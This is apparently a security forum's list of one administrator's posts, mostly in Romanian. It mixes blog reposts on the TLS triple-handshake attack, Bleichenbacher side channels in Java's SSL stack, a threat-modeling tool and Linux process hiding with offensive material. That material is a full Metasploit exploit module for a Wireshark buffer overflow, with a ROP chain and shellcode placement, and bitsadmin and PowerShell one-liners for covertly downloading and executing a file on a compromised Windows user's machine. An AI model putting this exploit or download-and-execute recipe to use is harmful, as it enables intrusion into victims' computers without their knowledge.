Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Iti deschide in browser link-ul. Ideea e, normal, ca userul sa nu stie ca i se descarca un fisier in calculator. Si nu toate fisierele pe toate browserele sunt descarcate automat si puse in Downloads. Ca nota legat de "bitsadmin", e nevoie ca serverul HTTP sa fie unul "ok", unul care sa suporte Range-Bytes si care sa nu raspunda cu HTTP 405. Spun asta pentru ca am instalat doua mini-servere HTTP stupide si nu au functionat. Cu Apache e ok. Ca sa inteleaga toata lumea, metoda e pentru cazul in care: 1. ai acces shell la un user (adica acces la "linia de comanda", poti executa comenzi) 2. poti executa doar comenzi de Windows, nu ai alte fisiere pe care poti sa le pui 3. user-ul nu trebuie sa afle in niciun fel ca se intampla ceva ciudat la el in calculator 4. nu trebuie sa te complici sa scrii zeci de comenzi ca sa descarci un fisier PS: Asa puteti face un "Download & Execute" cu 2 linii de cod.
  2. Alta optiune, cu PowerShell, dar cred ca merge doar pe Windows 7 si Windows 8. powershell -Command "(New-Object Net.WebClient).DownloadFile('http://www.foo.com/package.zip', 'package.zip')" @Kalashnikov. Asa ai si Firefox. Dar nu cand ai doar shell. Adica doar poti executa comenzi.
  3. Salut, In caz ca vreodata aveti nevoie de un mijloc rapid de download pe un PC cu Windows la care aveti shell: bitsadmin.exe /transfer "JobName" http://download.url/here.exe C:\destination\here.exe L-am gasit aici: Windows batch file file download from a URL - Stack Overflow
  4. Use after free iar VGX.dll care probabil nu e compilat cu suport pentru ASLR, e folosit pentru bypass DEP si ASLR.
  5. @ CoffeeMan, chiar a fost redeschis de curand
  6. Nytro

    Fun stuff

    _|_
  7. [h=3]Attack of the Week: Triple Handshakes (3Shake)[/h]The other day Apple released a major security update that fixes a number of terrifying things that can happen to your OS/X and iOS devices. You should install it. Not only does this fix a possible remote code execution vulnerability in the JPEG parser (!), it also patches a TLS/SSL protocol bug known as the "Triple Handshake" vulnerability. And this is great timing, since Triple Handshakes are something I've been meaning (and failing) to write about for over a month now. But before we get there: a few points of order. First, if Heartbleed taught us one thing, it's that when it comes to TLS vulnerabilities, branding is key. Henceforth, and with apologies to Bhargavan, Delignat-Lavaud, Pironti, Fournet and Strub (who actually discovered the attack*), for the rest of this post I will be referring to the vulnerability simply as "3Shake". I've also taken the liberty of commissioning a logo. I hope you like it. On a more serious note, 3Shake is not Heartbleed. That's both good and bad. It's good because Heartbleed was nasty and 3Shake really isn't anywhere near as dangerous. It's bad since, awful as it was, Heartbleed was only an implementation vulnerability -- and one in a single TLS library to boot. 3Shake represents a novel and fundamental bug in the TLS protocol. The final thing you should know about 3Shake is that, according to the cryptographic literature, it shouldn't exist. You see, in the last few years there have been at least three four major crypto papers purporting to prove the TLS protocol secure. The existence of 3Shake doesn't make those results wrong. It may, however, indicate that cryptographers need to think a bit more about what 'secure' and 'TLS' actually mean. For me, that's the most fascinating implication of this new attack. I'll proceed with the usual 'fun' question-and-answer format I save for this sort of thing. What is TLS and why should you care? Since you're reading this blog, you probably already know something about TLS. You might even realize how much of our infrastructure is protected by this crazy protocol. In case you don't: TLS is a secure transport protocol that's designed to establish communications between two parties, who we'll refer to as the Client and the Server. The protocol consists of two sub-protocols called the handshake protocol and the record protocol. The handshake is intended to authenticate the two communicating parties and establish shared encryption keys between them. The record protocol uses those keys to exchange data securely. For the purposes of this blog post, we're going to focus primarily on the handshake protocol, which has (at least) two major variants: the RSA handshake and the Diffie-Hellman handshake (ECDHE/DHE). These are illustrated below. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Simplified description of the TLS handshakes. Top: RSA handshake. Bottom: Diffie-Hellman handshake.[/TD] [/TR] [/TABLE] As much as I love TLS, the protocol is a hot mess. For one thing, it inherits a lot of awful cryptography from its ancient predecessors (SSLv1-3). For another, it's only really beginning to be subjected to rigorous, formal analysis. All this means we're just now starting to uncover some of the bugs that have been present in the protocol since it was first designed. And we're likely to discover more! That's partly because this analysis is at a very early stage. It's also partly because, from an analysts' point of view, we're still trying to figure out exactly what the TLS handshake is supposed to do. Well, what is the TLS handshake supposed to do? Up until this result, we thought we had a reasonable understanding of the purpose of the TLS handshake. It was intended to authenticate one or both sides of the connection, then establish a shared cryptographic secret (called the Master Secret) that could be used to derive cryptographic keys for encrypting application data. The first problem with this understanding is that it's a bit too simple. There isn't just one TLS handshake, there are several variants of it. Worse, multiple different handshake types can be used within a single connection. The standard handshake flow is illustrated -- without crypto -- in the diagram below. In virtually every TLS connection, the server authenticates to the client by sending a public key embedded in a certificate. The client, for its part, can optionally authenticate itself by sending a corresponding certificate and proving it has the signing key. However this client authentication is by no means common. Many TLS connections are authenticated only in one direction. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Common TLS handshakes. Left: only server authenticates. Right: client and server both authenticate with certificates.[/TD] [/TR] [/TABLE] TLS also supports a "renegotiation" handshake that can switch an open connection from one mode to the other. This is typically used to change a connection that was authenticated only in one direction (Server->Client) into a connection that's authenticated in both directions. The server usually initiates renegotiation when the client has e.g., asked for a protected resource. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Renegotiating a session. A new handshake causes the existing connection to be mutually authenticated.[/TD] [/TR] [/TABLE] Renegotiation has had problems before. Back in 2009, Ray and Dispensa showed that a man-in-the-middle attacker could actually establish a (non-authenticated) connection with some server; inject some data; and when the server asks for authentication, the attacker could then "splice" on a real connection with an authorized client by simply forwarding the new handshake messages to the legitimate client. From the server's point of view, both communications would seem to be coming from the same (now authenticated) person: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Ray/Dispensa attack from 2009. The attacker first establishes an unauthenticated connection and injects some traffic ("drop table *"). When the server initiates a renegotiation for client authentication, the attacker forwards the new handshake messages to an honest client Alice who then sends real traffic. Since the handshakes are not bound together, Bob views this as a single connection to one party.[/TD] [/TR] [/TABLE] To fix this, a "secure renegotiation" band-aid to TLS was proposed. The rough idea of this extension was to 'bind' the renegotiation handshake to the previous handshake, by having the client present the "Finished" message of the previous handshake. Since the Finished value is (essentially) a hash of the Master Secret and the (hash of) the previous handshake messages, this allows the client to prove that it -- not an attacker -- truly negotiated the previous connection. All of this brings us back to the question of what the TLS handshake is supposed to do. You see, the renegotiation band-aid now adds some pretty interesting new requirements to the TLS handshake. For one thing, the security of this extension depends on the idea that (1) no two distinct handshakes will happen to use the same Master Secret, and (2) that no two handshakes will have the same handshake messages, ergo (3) no two handshakes will have the same Finished message. Intuitively, this seemed like a pretty safe thing to assume -- and indeed, many other systems that do 'channel binding' on TLS connections also make this assumption. The 3Shake attack shows that this is not safe to assume at all. So what's the problem here? It turns out that TLS does a pretty good job of establishing keys with people you've authenticated. Unfortunately there's a caveat. It doesn't truly guarantee the established key will be unique to your connection. This is a pretty big violation of the assumptions that underlie the "secure renegotiation" fix described above. For example: imagine that Alice is (knowingly) establishing a TLS connection to a server Mallory. It turns out that Mallory can simultaneously -- and unknown to Alice -- establish a different connection to a second server Bob. Moreover, if Mallory is clever, she can force both connections to use the same "Master Secret" (MS). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Mallory creates two connections that use the same Master Secret.[/TD] [/TR] [/TABLE] The first observation of the 3Shake attack is that this trick can be played if Alice supports either of the or RSA and DHE handshakes -- or both (it does not seem to work on ECDHE). Here's the RSA version:** [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]RSA protocol flow from the triple handshake attack (source). The attacker is in the middle, while the client and server are on the left/right respectively. MS is computed as a function of (pms, cr, sr) which are identical in both handshakes. [/TD] [/TR] [/TABLE] So already we have a flaw in the logic undergirding secure renegotiation. The Master Secret (MS) values are not necessarily distinct between different handshakes. Fortunately, the above attack does not let us resurrect the Ray/Dispensa injection attack. While the attacker has tricked the client into using a specific MS value, the handshake Finished messages -- which the client will attach to the renegotiation handshake -- will not be the same in both handshakes. That's because (among other things) the certificates sent on each connection were very different, hence the handshake hashes are not identical. In theory we're safe. But here is where TLS gets awesome. You see, there is yet another handshake I haven't told you about. It's called the "session resumption handshake", and it allows two parties who've previously established a master secret (and still remember it) to resume their session with new encryption keys. The advantage of resumption is that it uses no public-key cryptography or certificates at all, which is supposed to make it faster. It turns out that if an attacker knows the previous MS and has caused it to be the same on both sides, it can now wait until the client initiates a session resumption. Then it can replay messages between the client and server in order to update both connections with new keys: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]An attacker replays the session resumption handshake to ensure the same key on both sides. Note that the handshake messages are identical in both connections. (authors of source)[/TD] [/TR] [/TABLE] Which brings us to the neat thing about this handshake. Not only is the MS the same on both connections, but both connections now see exactly the same (resumption) handshake messages. Hence the hash of these handshakes will be identical, which means in turn that their "Finished" message will be identical. By combining all of these tricks, a clever attacker can pull off the following -- and absolutely insane -- "triple handshake" injection attack: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Triple handshake attack. The attacker mediates two handshakes that give MS on both sides, but two different handshake hashes. The resumption handshake leaves the same MS and an identical handshake hash on both sides. This means that the Finished message from the resumption handshake will be the same for the connections on either side of the attacker. Now he can hook up the two without anyone noticing that he previously injected traffic.[/TD] [/TR] [/TABLE] In the above scenario, an attacker first runs a (standard) handshake to force both sides of the connection to use the same MS. It then causes both sides to perform session resumption, which results in both sides using the same MS and having the same handshake hash and Finished messages on both sides. When the server initiates renegotiation, the attacker can forward the third (renegotiation) handshake on to the legitimate client as in the Ray/Dispensa attack -- secure in the knowledge that both client and server will expect the same Finished token. And that's the ballgame. What's the fix? There are several, and you can read about them here. One proposed fix is to change the derivation of the Master Secret such that it includes the handshake hash. This should wipe out most of the attacks above. Another fix is to bind the "session resumption" handshake to the original handshake that led to it. Wait, why should I care about injection attacks? You probably don't, unless you happen to be one of the critical applications that relies on the client authentication and renegotiation features of TLS. In that case, like most applications, you probably assumed that a TLS connection opened with a remote user was actually from that user the whole time, and not from two different users. If you -- like most applications -- made that assumption, you might also forget to treat the early part of the connection (prior to client authentication) as a completely untrusted bunch of crap. And then you'd be in a world of hurt. But don't take my word for it. There's video! (See here for the source, background and details): What does this have to do with the provable security of TLS? Of all the questions 3Shake raises, this one is the most interesting. As I mentioned earlier, there have been several recent works that purport to prove things about the security of TLS. They're all quite good, so don't take any of this as criticism. However, they also didn't find this attack. Why is that? The first reason is simple: many of these works analyze only the basic TLS handshake, or they omit at least one of the possible handshakes (e.g., resumption). This means they don't catch the subtle interactions between the resumption handshake, the renegotiation handshake, and extensions -- all of which are the exact ingredients that make most TLS attacks possible. The second problem is that we don't quite know what standard we're holding TLS to. For example, the common definition of security for TLS is called "Authenticated and Confidential Channel Establishment" (ACCE). Roughly speaking this ensures that two parties can establish a channel and that nobody will be able to determine what data is being sent over said channel. The problem with ACCE is that it's a definition that was developed specifically so that TLS could satisfy it. As a result, it's necessarily weak. For example, ACCE does not actually require that each handshake produces a unique Master Secret -- one of the flaws that enables this attack -- because such a definition was not possible to achieve with the existing TLS protocol. In general this is what happens when you design a protocol first and prove things about it later. What's the future for TLS? Can't we throw the whole thing out and start over again? Sure, go ahead and make TLS Rev 2. It can strip out all of this nonsense and start fresh. But before you get cocky, remember -- all these crazy features in TLS were put there for a reason. Someone wanted and demanded them. And sadly, this is the difference between a successful, widely-used protocol and your protocol. Your new replacement for TLS might be simple and wonderful today, but that's only because nobody uses it. Get it out into the wild and before long it too will be every bit as crazy as TLS. Notes: * An earlier version of this post incorrectly identified the researchers who discovered the attack. ** The Diffie-Hellman (DHE) version is somewhat more clever. It relies on the attacker manipulating the D-H parameters such that they will force the client to use a particular key. Since DHE parameters sent down from the server are usually 'trusted' by TLS implementations, this trick is relatively easy to pull off. Posted by Matthew Green at 9:13 AM Sursa: A Few Thoughts on Cryptographic Engineering: Attack of the Week: Triple Handshakes (3Shake)
  8. [h=1]Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow[/h] # Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow # Date: 24/04/2014 # Exploit Author: j0sm1 # Vendor Homepage: www.wireshark.org # Software Link: http://wireshark.askapache.com/download/win32/all-versions/ # Version: < 1.8.12/1.10.5 # Tested on: Windows XP SP3 # CVE : cve-2014-2299 # Metasploit URL module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb # # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating an malicious file.) }, 'License' => MSF_LICENSE, 'Author' => [ 'Wesley Neelen', # Discovery vulnerability 'j0sm1', # Exploit and msf module ], 'References' => [ [ 'CVE', '2014-2299'], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ], [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ], [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'BadChars' => "\xff", 'Space' => 600, 'DisableNops' => 'True', 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 }, 'Platform' => 'win', 'Targets' => [ [ 'WinXP SP3 Spanish (bypass DEP)', { 'OffSet' => 69732, 'OffSet2' => 70476, 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 'jmpesp' => 0x68e2bfb9, } ], [ 'WinXP SP2/SP3 English (bypass DEP)', { 'OffSet2' => 70692, 'OffSet' => 70476, 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module 'jmpesp' => 0x68e2bfb9, } ], ], 'Privileged' => false, 'DisclosureDate' => 'Mar 20 2014' )) register_options( [ OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']), ], self.class) end def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x00000201, # 0x00000201-> ebx 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] 0x00000040, # 0x00000040-> edx 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x668242b9, # &Writable location [libgnutls-26.dll] 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x90909090, # nop 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] ].flatten.pack("V*") return rop_gadgets end def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") ropchain = create_rop_chain magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure # Here we build the packet data packet = rand_text_alpha(883) packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << ropchain packet << payload.encoded # Shellcode packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000 # After nseh and seh we haven't space, then we have to jump to another location. # When file is open with command line. This is NSEH/SEH overwrite packet << make_nops(4) # nseh packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk # When file is open with GUI interface. This is NSEH/SEH overwrite packet << make_nops(4) # nseh # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** packet << "\x55\x59\x80\x6b" print_status("Preparing payload") filecontent = magic_header filecontent << packet print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes") file_create(filecontent) end end Sursa: Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow
  9. @em e unul dintre liderii Anonymous. E baiat bun, fan Reckon. Mai era si Black death insa din cauza problemelor de sanatate (de greutate) s-a retras. Din pacate nu s-a retras si din salile de mese. Sent from my P5_Quad using Tapatalk
  10. SecurityFocus: vBulletin Multiple Cross Site Scripting Vulnerabilities IBM ISS: ISS X-Force Database: vbulletin-multiple-scripts-xss(92664): vBulletin multiple scripts cross-site scripting SCIP: vBulletin up to 5.1.1 Alpha 9 cross site scripting Boschetarii de la exploit-db inca nu l-au bagat. Sa ii anunte cineva ca a trecut Pastele.
  11. Daca ai timp la dispozitie, iti place si vrei sa inveti Linux, vrei sa te familiarizezi cu compilarea surselor sau chiar a kernelului, sa intelegi cum functioneaza si sa poti configura cum vrei tu un Linux, incearca Slackware. Efecte adverse: injuraturi, nervi, spume la gura, tastaturi sparte. Dar merita. :
  12. Facilitarea accesului la materiale piratate? Ha? Unde e logica? Sa inchida si fabricile de armament pentru facilitarea crimelor.
  13. [h=3]Introducing Microsoft Threat Modeling Tool 2014[/h] Today, we are excited to announce the general availability of a new version of a very popular Security Development Lifecycle tool – Microsoft Threat Modeling Tool 2014. It’s available as a free download from Microsoft Download Center here. Threat modeling is an invaluable part of the Security Development Lifecycle (SDL) process. We have discussed in the past how applying a structured approach to threat scenarios during the design phase of development helps teams more effectively and less expensively identify security vulnerabilities, determine risks from those threats, and establish appropriate mitigations. For those who would like more of an introduction to threat modeling, please visit Threat Modeling: Uncover Security Design Flaws Using the STRIDE Approach. But, without further ado, let’s dig into the fun stuff – the new features of Threat Modeling Tool 2014. Microsoft Threat Modeling Tool 2014 - Changes and New Features Microsoft announced the general availability of the SDL Threat Modeling Tool v3.1.8 in 2011, which gave software development teams an approach to design their security systems following the threat modeling process. Microsoft Threat Modeling Tool 2014 introduces many improvements and new features, see the highlights below. Figure 1. Microsoft Threat Modeling Tool 2014 Home Screen NEW DRAWING SURFACE One of our goals with this release is to provide a simplified workflow for building a threat model and help remove existing dependencies. You’ll find intuitive user interface with easy navigation between different modes. The new version of the tool has a new drawing surface and Microsoft Visio is no longer required to create new threat models. Using the Design View of the tool, you can create your data flow diagram using the included stencil set (see Figure 2). Figure 2. Microsoft Threat Modeling Tool 2014 - Design View MIGRATION FOR V3 THREAT MODELS Threat modeling is an iterative process. Development teams create threat models which evolve over time as systems and threats change. We wanted to make sure the new tool supports this flow. Microsoft Threat Modeling Tool 2014 offers migration of threat models created with version 3.1.8, which allows an easy update to existing threat models of security system designs. (NOTE: For migrating threat models from v3.1.8 only, Microsoft Visio 2007 or later is required). Threat models created with v3 version of the tool (.tms format) can be migrated to new format (.tm4) (see Figure 3). Figure 3. Migrating v3 Threat Models STRIDE PER INTERACTION One of the key changes we are introducing is the update to threat generation logic. With previous versions of the tool we have taken the approach of using STRIDE per element. Microsoft Threat Modeling Tool 2014 uses STRIDE categories and generates threats based on the interaction between elements. We take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements. When in Analysis View, the tool will show the suggested threats for your data flow diagram in a simple grid (see Figure 4). Figure 4. Microsoft Threat Modeling Tool 2014 – Analysis View DEFINE YOUR OWN THREATS Microsoft Threat Modeling Tool 2014 comes with a base set of threat definitions using STRIDE categories. This set includes only suggested threat definitions and mitigations which are automatically generated to show potential security vulnerabilities for your data flow diagram. You should analyze your threat model with your team to ensure you have addressed all potential security pitfalls. To offer more flexibility, Microsoft Threat Modeling Tool 2014 gives users the option to add their own threats related to their specific domain. This means users can extend the base set of threat definitions by authoring the provided XML format. For details on adding your own threats, see the Threat Modeling tool SDK. With this feature, we have higher confidence that our users can get the best possible picture of their threat landscape (see Figure 5). Figure 5. Threat Model Definitions Grammar in Backus-Naur Form (BNF) We hope these new enhancements in Microsoft Threat Modeling Tool 2014 will provide greater flexibility and help enable you to effectively implement the SDL process in your organization. Thank you to all who helped shipping this release through internal and external feedback. Your input was critical to improving the tool and customer experience. For more information and additional resources, visit: Microsoft Security Development Lifecycle (SDL) Uncover Security Design Flaws Using the STRIDE Approach Getting Started with Threat Modeling: Elevation of Privilege (EoP) Game Reinvigorate your Threat Modeling Process Threat Models Improve Your Security Process Threat Modeling: Designing for Security (BOOK) Emil Karafezov is a Program Manager on the Secure Development Tools and Policies team at Microsoft. He’s responsible for the Threat Modeling component of the Security Development Lifecycle (SDL). Sursa: Introducing Microsoft Threat Modeling Tool 2014 - The Security Development Lifecycle - Site Home - MSDN Blogs
  14. Linux Security: How to hide processes from other users Small and at the same time great article from Steve on http://www.debian-administration.org/. — If you run a multi-user system it can increase security if you hide the display of running processes, and their arguments, which belong to other users. This helps avoid problems if users enter passwords on the command-line, and similar. If you’re running a recent Kernel, (version 3.2 or higher), you can achieve this benefit by mounting the /proc filesystem with the new hidepid option: [TABLE] [TR] [TH]Value[/TH] [TH]Meaning[/TH] [/TR] [TR] [TD]0[/TD] [TD]This is the default setting and gives you the default behaviour.[/TD] [/TR] [TR] [TD]1[/TD] [TD]With this option a normal user would not see other processes but their own in ps, top etc, but would is still be able to see process IDs beneath /proc[/TD] [/TR] [TR] [TD]2[/TD] [TD]Users are only able to see their own processes (as with with hidepid=1), but also any other process IDs are hidden for them if they manually poke around beneath /proc[/TD] [/TR] [/TABLE] It is worth noting that with the secure values set (“1?, or “2?) all processes remain visible to the root user. If you decide you wish to enable this protection you can change the mount option interactively by running: # mount -o remount /proc -o hidepid=2 To ensure this happens automatically at boot-time you can update your /etc/fstab file to read something like this: proc /proc proc defaults,hidepid=2 0 0 With this in place a user will only see their own processes in the output of top, ps, & etc: s-blog@www:~$ ps -ef UID PID PPID C STIME TTY TIME CMD s-blog 848 32483 0 08:55 pts/1 00:00:00 ps -ef s-blog 32483 32482 0 08:54 pts/1 00:00:00 -bash The root user will still see all processes though, for debugging purposes. According to a recent post from the Debian Security Team it seems likely that the hidepid option will be proposed as a default in the future. Sursa: » Linuxaria – Everything about GNU/Linux and Open source Linux Security: How to hide processes from other users
  15. Digging Deep Into The Flash Sandboxes Type: Video Tags: Flash Authors: Mark Vincent Yason, Paul Sabanal Event: Black Hat USA 2012 Indexed on: Apr 17, 2014 URL: https://media.blackhat.com/us-12/video/us-12-Sabanal-Digging-Deep-Into-The-Flash-Sandboxes.mp4 File name: us-12-Sabanal-Digging-Deep-Into-The-Flash-Sandboxes.mp4 File size: 162.1 MB MD5: 794e3c2b928a1135b2be260f59610bcaSHA1b6ea828164ff98cb88fba008eff393ac18560071
  16. Easter Hack: Even More Critical Bugs in SSL/TLS Implementations It's been some time since my last blog post - time for writing is rare. But today, I'm very happy that Oracle released the brand new April Critical Patch Update, fixing 37 vulnerabilities in our beloved Java (seriously, no kidding - Java is simply a great language!). With that being said, all vulnerabilities reported by my colleagues (credits go to Juraj Somorovsky, Sebastian Schinzel, Erik Tews, Eugen Weiss, Tibor Jager and Jörg Schwenk) and me are fixed and I highly recommend to patch as soon as possible if you are running a server powered by JSSE! Additional results on crypto hardware suffering from vulnerable firmware are ommited at this moment, because the patch(es) isn't/aren't available yet - details follow when the fix(es) is/are ready. To keep this blog post as short as possible I will skip a lot of details, analysis and pre-requisites you need to know to understand the attacks mentioned in this post. If you are interested use the link at the end of this post to get a much more detailed report. Resurrecting Fixed Attacks Do you remember Bleichenbacher's clever million question attack on SSL from 1998? It was believed to be ?xed with the following countermeasure specified in the TLS 1.0 RFC: “The best way to avoid vulnerability to this attack is to treat incorrectly formatted messages in a manner indistinguishable from correctly formatted RSA blocks. Thus, when it receives an incor- rectly formatted RSA block, a server should generate a random 48-byte value and proceed using it as the premaster secret. Thus, the server will act identically whether the received RSA block is correctly encoded or not.” – Source: RFC 2246 In simple words, the server is advised to create a random PreMasterSecret in case of problems during processing of the received, encrypted PreMasterSecret (structure violations, decryption errors, etc.). The server must continue the handshake with the randomly generated PreMasterSecret and perform all subsequent computations with this value. This leads to a fatal Alert when checking the Finished message (because of different key material at client- and server-side), but it does not allow the attacker to distinguish valid from invalid (PKCS#1v1.5 compliant and non-compliant) ciphertexts. In theory, an attacker gains no additional information on the ciphertext if this countermeasure is applied (correctly). Guess what? The fix itself can introduce problems: Different processing times caused by different code branches in the valid and invalid cases What happens if we can trigger Excpetions in the code responsible for branching? If we could trigger different Exceptions, how would that influence the timing behaviour? Let's have a look at the second case first, because it is the easiest one to explain if you are familiar with Bleichenbacher's attack: Exploiting PKCS#1 Processing in JSSE A coding error in the com.sun.crypto.provider.TlsPrfGenerator (missing array length check and incorrect decoding) could be used to force an ArrayIndexOutOfBoundsException during PKCS#1 processing. The Exception finally led to a general error in the JSSE stack which is being communicated to the client in form of an INTERNAL_ERROR SSL/TLS alert message. What can we learn from this? The alert message is only send if we are already inside the PKCS#1 decoding code blocks! With this side channel Bleichenbacher's attack can be mounted again: An INTERNAL_ERROR alert message suggests a PKCS#1 structure that was recognized as such, but contained an error - any other alert message was caused by the different processing branch (the countermeasure against this attack). The side channel is only triggered if the PKCS#1 structure contains a specific structure. This structure is shown below. If a 00 byte is contained in any of the red marked positions the side-channel will help us to recognize these ciphertexts. We tested our resurrected Bleichenbacher attack and were able to get the decrypted PreMasterSecret back. This took about 5h and 460000 queries to the target server for a 2048 bit key. Sounds much? No problem... By using the newest, high performance adaption of the attack (many thanks to Graham Steel for very the helpful discussions!) resulted in only about 73710 queries in mean for a 4096 bit RSA key! This time JSSE was successfully exploited once. But let's have a look on a much more complicated scenario. No obvious presence of a side channel at all Maybe we can use the first case... Secret Depending Processing Branches Lead to Timing Side Channels A conspicuousness with respect to the random PreMasterSecret generation (you remeber, the Bleichenbacher countermeasure) was already obvious during the code analysis of JSSE for the previous attack: The random PreMasterSecret was only generated if problems occured during PKCS#1 decoding. Otherwise, no random bytes were generated (sun.security.ssl.Handshaker.calculateMasterSecret(...)). The question is, how time consuming is the generation of a random PreMasterSecret? Well, it depends and there is no definitive answer to this question. Measuring time for valid and invalid ciphertexts revealed blurred results. But at least, having different branches with different processing times introduces the chance for a timing side channel. This is why OpenSSL was independently patched during our research to guarantee equal processing times for both, valid and invalid ciphertexts. Risks of Modern Software Design To make a long story short, it turned out that not the random number generation caused the timing side channel, but the concept of creating and handling Exceptions. Throwing and catching Exceptions is a very expensive task with regards towards the consumption of processing time. Unfortunately, the Java code responsible for PKCS#1 decoding ( sun.security.rsa.RSAPadding.unpadV15(...)) was written with the best intentions from a developers point of view. It throws Exceptions if errors occur during PKCS#1 decoding. Time measurements revealed significant differences in the response time of a server when confronted with valid/invalid PKCS#1 structures. These differences could even be measured in a live environment (university network) with a lot of traffic and noise on the line. Again, how is this useful? It's always the same - when knowing that the ciphertext reached the PKCS#1 decoding branch, you know it was recognized as PKCS#1 and thus represents a useful and valid side channel for Bleichenbacher's attack. The attack on an OpenJDK 1.6 powered server took about 19.5h and 18600 oracle queries in our live setup! JSSE was hit the second time.... OAEP Comes To The Rescue Some of you might say "Switch to OAEP and all of your problems are gone....". I agree, partly. OAEP will indeed fix a lot of security problems (but definitely not all!), but only if implemented correctly. Manger told us that implementing OAEP the wrong way could have disastrous results. While looking at the OAEP decoding code insun.security.rsa.RSAPadding it turned out that the code contained a behaviour similar to the one described by Manger as problematic. This could have led to another side channel if SSL/TLS did already offer OAEP support.... All the vulnerabilties mentioned in this post are fixed, but others are in the line to follow... We submitted a research paper which will explain the vulnerabilities mentioned here in more depth and the unpublished ones as well, so stay tuned - there's more to come. Many thanks to my fellow researchers Juraj Somorovsky, Sebastian Schinzel, Erik Tews, Eugen Weiss, Tibor Jager and Jörg Schwenk all of our findings wouldn't have been possible without everyones speical contribution. It needs a skilled team to turn theoretical attacks into practice! A more detailed analysis of all vulnerabilities listed here, as well as a lot more on SSL/TLS security can be found in my Phd thesis: 20 Years of SSL/TLS Research: An Analysis of the Internet's Security Foundation. Gepostet vor 3 days ago von Chris Meyer Sursa: Java Security and Related Topics: Easter Hack: Even More Critical Bugs in SSL/TLS Implementations
